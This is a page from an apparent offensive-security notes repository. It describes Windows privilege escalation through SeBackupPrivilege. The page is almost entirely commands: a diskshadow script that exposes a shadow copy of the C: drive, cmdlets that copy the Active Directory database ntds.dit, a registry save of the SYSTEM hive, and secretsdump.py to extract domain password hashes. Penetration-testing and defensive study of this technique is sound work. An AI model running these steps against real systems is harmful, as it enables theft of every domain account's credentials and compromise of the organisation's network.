whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/post_exploitation/docs/windows/sebackupprivilege.md

1.0 KiB
Raw Blame History

SEBackupPrivilege Escalation

  • Check user privileges to escalate

Usage

  • Check whoami /all
  • SeBackupPrivilege must be present
  • Payloads all the things
  • Upload diskshadow.txt to the target with the following content
set metadata C:\tmp\tmp.cabs 
set context persistent nowriters 
add volume c: alias someAlias 
create 
expose %someAlias% h:
  • Change dir to C:\Windows\System32 and diskshadow.exe /s C:\Path\to\diskshadow.txt
  • Upload these dlls to the target
import-module .\SeBackupPrivilegeUtils.dll
import-module .\SeBackupPrivilegeCmdLets.dll
copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite
reg save HKLM\SYSTEM C:\Path\to\uploads\system
  • Downloads the files ntds.dit and system
  • Extract the hashes via
secretsdump.py -system system -ntds ntds.dit LOCAL > out.txt